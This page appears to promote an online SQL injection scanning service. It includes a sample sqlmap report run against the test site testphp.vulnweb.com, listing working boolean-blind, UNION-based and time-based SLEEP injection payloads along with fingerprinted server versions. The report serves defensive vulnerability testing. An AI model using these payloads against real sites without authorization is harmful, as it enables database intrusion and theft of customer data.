SQL Injection Test Help
Entering a web address into the form will have that url tested for SQL Injection by one of our external servers. This type of vulnerability could allow backend database manipulation, access to customer data or even operating system access.
SQL Injection is a significant ongoing risk to organizations on the Internet as can be seen by recent news reports.
HackerTarget.com Sample SQL Injection Report
sqlmap/0.9 – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 09:04:35
[09:04:36] [INFO] using ‘/opt/sqlmap/output/testphp.vulnweb.com/session’ as session file
[09:04:36] [INFO] testing connection to the target url
[09:04:37] [INFO] testing if the url is stable, wait a few seconds
[09:04:38] [INFO] url is stable
[09:04:38] [INFO] testing if GET parameter ‘artist’ is dynamic
[09:04:38] [INFO] confirming that GET parameter ‘artist’ is dynamic
[09:04:39] [INFO] GET parameter ‘artist’ is dynamic
[09:04:39] [INFO] heuristic test shows that GET parameter ‘artist’ might be injectable (possible DBMS: MySQL)
[09:04:39] [INFO] testing sql injection on GET parameter ‘artist’
[09:04:39] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[09:04:40] [INFO] GET parameter ‘artist’ is ‘AND boolean-based blind – WHERE or HAVING clause’ injectable
[09:04:40] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’
[09:04:41] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[09:04:41] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind’
[09:04:52] [INFO] GET parameter ‘artist’ is ‘MySQL > 5.0.11 AND time-based blind’ injectable
[09:04:52] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 10 columns’
[09:04:55] [INFO] target url appears to be UNION injectable with 3 columns
[09:04:56] [INFO] GET parameter ‘artist’ is ‘MySQL UNION query (NULL) – 1 to 10 columns’ injectable
GET parameter ‘artist’ is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:
—
Place: GET
Parameter: artist
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: artist=2 AND 683=683Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: artist=-743 UNION ALL SELECT NULL, CONCAT(CHAR(58,105,117,110,58),IFNULL(CAST(CHAR(67,106,71,66,118,97,119,68,106,119) AS CHAR),CHAR(32)),CHAR(58,100,107,122,58)), NULL#Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: artist=2 AND SLEEP(5)
—[09:05:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0.11
[09:05:16] [INFO] Fetched data logged to text files under ‘/opt/sqlmap/output/testphp.vulnweb.com’[*] shutting down at: 09:05:16
Free Web Mail addresses such as gmail accounts are restricted to reduce abuse of the system. A valid membership is required to use free email addresses.
A url with parameters at the end is the type of URI tested by this scan:
- www.example.com?id=2&page=2
This url will have the parameter’s id and page tested for sql injection.
Online SQL Injection scan to test for injectable parameters on a web URI, testing methods include blind and error based SQL Injection.
Note that you must have permission to scan the site you nominate. It is possible that automated security scans will upset listening services, fill up log files and trigger IDS.
Enter the url to test and your email address; results are emailed immediately.
About SQL Injection
Injection from
this excellent Book
SQL Injection is a common attack vector in dynamic web applications. It allows an attacker to gain access to the database or database functions through poor coding methodology. A good SQL injection reference is over at the owasp site.
Recently there have been a number of high profile attacks that have been exploited by SQL Injection, these have resulted in the loss of millions of customer records and hundreds of thousands of login / password combinations.
